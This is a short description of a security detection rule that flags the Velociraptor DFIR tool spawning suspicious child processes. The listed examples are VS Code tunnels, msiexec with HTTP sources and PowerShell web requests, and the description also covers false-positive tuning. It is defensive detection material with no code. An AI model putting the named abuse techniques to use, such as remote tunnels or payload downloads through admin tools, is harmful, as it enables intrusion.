This detection rule identifies suspicious activity associated with the Velociraptor Digital Forensics and Incident Response (DFIR) tool, specifically when it is used to spawn child processes that may be indicative of malicious behavior. The rule captures instances where Velociraptor, typically used as a legitimate administrative tool, executes other tools or downloads payloads, a method seen in recent cyberattack campaigns that leveraged this tool for remote access and further attack staging. By monitoring the creation of processes originating from Velociraptor, the rule helps delineate between normal administrative usage and potential abuse. The detection criteria set forth in the rule focus on specific child processes that are commonly associated with malicious use, such as Visual Studio Code tunnel commands, Windows Installer commands involving HTTP resources, and various PowerShell invocations related to web requests. The rule emphasizes the need to balance detection sensitivity with the potential for false positives, especially in environments where legitimate administrators might similarly use Velociraptor for benign purposes. Proper tuning and exclusion of known administrative actions are recommended to refine the accuracy of detections without raising unnecessary alerts.